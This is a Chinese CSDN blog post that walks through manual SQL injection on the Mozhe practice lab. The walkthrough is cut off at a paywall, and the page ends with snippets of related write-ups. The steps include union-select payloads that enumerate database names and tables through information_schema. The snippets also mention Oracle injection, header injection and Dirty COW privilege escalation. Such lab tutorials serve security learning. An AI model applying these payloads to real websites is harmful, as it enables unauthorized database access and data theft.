数据库注入漏洞线上靶场练习(mozhe)

最新推荐文章于 2023-12-13 10:21:40 发布
最新推荐文章于 2023-12-13 10:21:40 发布
阅读量1.5k 收藏 4
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caption88/article/details/105228896
版权

今天练习了墨者的线上数据库漏洞手工注入(别问为什么,问就是简单,我可以做)。注:没有钱所以只做了几个,有钱的可以全部做完。

在你们去练习的前面我需要普及一些关于数据库的知识:第一点 数据库分为关系数据库和非关系数据库,两者代表(在我的印象里面的代表)关系型.Oracle,mysql,sqlserver,Access 非关系.MongoDB。两者的主要区别就是:https://blog.csdn.net/aaronthon/article/details/81714528。

练习的类型是关系型,非关系需要币。关系型的MySQL,SqlServer,Access,SQLite。

(漏洞在公告链接)

MySQL是最常见的数据库,一:通常使用单引号,and 1=1,1=2,来判断漏洞。(不要用常规的'来隔断)

二·:接着使用order by 判断字段长度(4)

三:接着使用联合查询 and 1=2 union select 1,2,3,4 来判断第几位可以显示(2,3)

四:接着使用 and 1=2 union select 1,database(),3,4 显示数据库名称(mozhe_Discuz_StormGroup)

五:接着使用联合查询 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table

最低0.47元/天 解锁文章
yujian404
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1
08-03
Mozhe的案例中,提权过程涉及发现和利用内核漏洞。攻击者首先连接到系统,然后获取可利用的内核漏洞信息,下载或上传EXP(exploit),编译EXP,并赋予执行权限。例如,`gcc 45010.c -o 45010`用于编译C源代码,...
渗透测试练习靶场汇总
热门推荐
Thunderclap的博客
07-01 1万+
渗透测试 练习常用靶场汇总
漏洞靶场实战-Vuluhub medium_socnet
qq_53058639的博客
02-04 493
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
靶场攻略 | 网络安全靶场合集
Python_0011的博客
10-11 3620
1JAVA环境。
24个常见渗透测试漏洞靶场列表
潇湘信安的博客
04-13 691
记得以前也有收藏过一些漏洞靶场,但是他要求在线的才好测试,所以帮他重新搜集整理了这份漏洞靶场列表,现在分享出来供大家练手学习。
网络安全靶场推荐,通过实操能快速提升实战技能!
Y525698136的博客
10-18 1801
自学网络安全知识,具备一定的理论基础,缺乏实战经验,想去网络靶场体验一下,通过实操能快速提升实战技能!
Web应用安全:Burpsuite重放模块介绍.pptx
06-20
它允许安全研究人员多次重放请求响应,并在修改请求后分析服务器的响应,以检测潜在的安全漏洞。 **重放模块的介绍** Burp Repeater允许用户捕获HTTP请求,对其进行编辑,然后重新发送,以便观察不同参数变化如何...
第06天:基础入门-加密编码算法1
08-03
在URL加密地址的漏洞测试中,可能涉及到AES与Base64的结合,以及自定义的加密模式,如CBC模式,解密时需分析加密参数,如128位密钥、偏移量等。 学习这些加密编码算法及其应用,可以借助一些在线工具,如: - ...
最新的墨者有隔离技术
10-28
压缩包内的“mozhe.exe”很可能就是包含该隔离技术的软件执行文件,用户下载后需要安装运行,以实现对密码和其他敏感数据的保护。而“说明_Readme.html”则可能是软件的使用指南或用户手册,其中会详细解释如何安装...
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 3899
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入是字符型的SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
TIWAP漏洞靶场平台
leo788的博客
01-05 2403
项目场景: 项目平台简介:Totally Insecure Web Application Project (TIWAP) 完全不安全的 Web 应用程序项目 其使用Flask制作,供新兴安全爱好者了解各种Web漏洞。 TIWAP 是一个 Web 应用程序,专为想要学习和探索该领域的 Web 应用程序安全初学者而设计,因此仅用于教育目的。它专注于 20 个漏洞,每个漏洞有 3 个难度级别。 项目数据栈: 完整的数据栈: 前端:HTML、CSS和JavaScript 后端:Flask 数据库:SQLi
Oracle数据库SQL注入环境搭建
最新发布
AomCC的博客
12-13 1061
要下载的镜像较大, 建议 https://cr.console.aliyun.com/cn-qingdao/instances/mirrors更换源之后,直接镜像, 这里选择 https://github.com/MaksymBilenko/docker-oracle-12c 镜像。
手注Oracle墨者靶场案例
weixin_48563815的博客
05-03 1747
判断注入点 通过判断?id=1 and 1=1 正确 ?id=1 and 1=2 错误 确定是个数字型注入点 判断列数 通过?id=1 order by 2-- 判断出存在两列数据 注意Oracle闭合后面语句的是 -- 判断字符类型 oracle自带虚拟表dual,oracle的查询语句必须完整的包含from字句,且每个字段的类型都要准确对应,一般使用null来判断类型。 例:?id=1 and 1=2 union select 'null','null' from dual 返回正常 a
在线靶场 ( 持续更新~ )
weixin_30828379的博客
10-22 3252
在这里我们收集了网络上的一下在线靶场 upload-labs http://upload-labs.caoyo.top 使用 库 下的免费空间所搭建,如想自主搭建想要的程序,请在 库 下访问 “ 免费空间 ” 项目! upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共19关,每一关都包...
墨者学院-在线靶场-HTTP头注入漏洞测试(X-Forwarded-for) Writeup
s0mor
08-09 812
首先题目提示 XFF注入,大致思路为Burp抓包添加XFF请求头进行注入。 启动靶场 点击进入墨者的任性网页 Burpsuite抓包,放进Repeater 先GO一下 在请求头中添加X-Forwarded-For 试了试 '、and 1=1 、 and 1=2都没反应 当改为or 1=1时,提示语法错误 继续,union注入步骤 order by 5提示未知字段5,order by 4返...
测试开发必备技能:安全测试漏洞靶场实战
04-11 4159
安全在互联网行业,是一个对专业性较强,且敏感的一个领域,所谓"一念成佛,一念入魔",安全技术利用得当,可以为你的产品、网站更好的保驾护航,而如果心术不正,利用安全漏洞去做一些未法牟利,则容易造成承担不必要的违法责任。 在日常很容易被大家忽略的一点,在非授权的情况下,对网站进行渗透攻击测试,也是属于非合规操作,是触及法律法规的。因此对于大家在学习安全测试过程中,通常建议是直接在本地直接搭建安全演练靶场环境,尽量避免直接对非授权的网站进行测试。 掌握安全测试是测试开发工程师进阶的一项硬技能,今天这篇文章,就
【fastjson 1.2.47漏洞复现实战(vulfocus在线靶场CNVD-2017-02833)——关注紫灵小姐姐不踩坑】
weixin_40416851的博客
08-28 937
fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。...............
墨者sql注入mysql
09-29
墨者在练习SQL手工注入时,发现PHP代码对客户端提交的参数未做任何过滤,可以利用这个漏洞进行注入。他可以通过两种方法来进行注入。 第一种方法是手工注入。墨者可以通过了解SQL注入原理和MySQL的数据结构,掌握...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值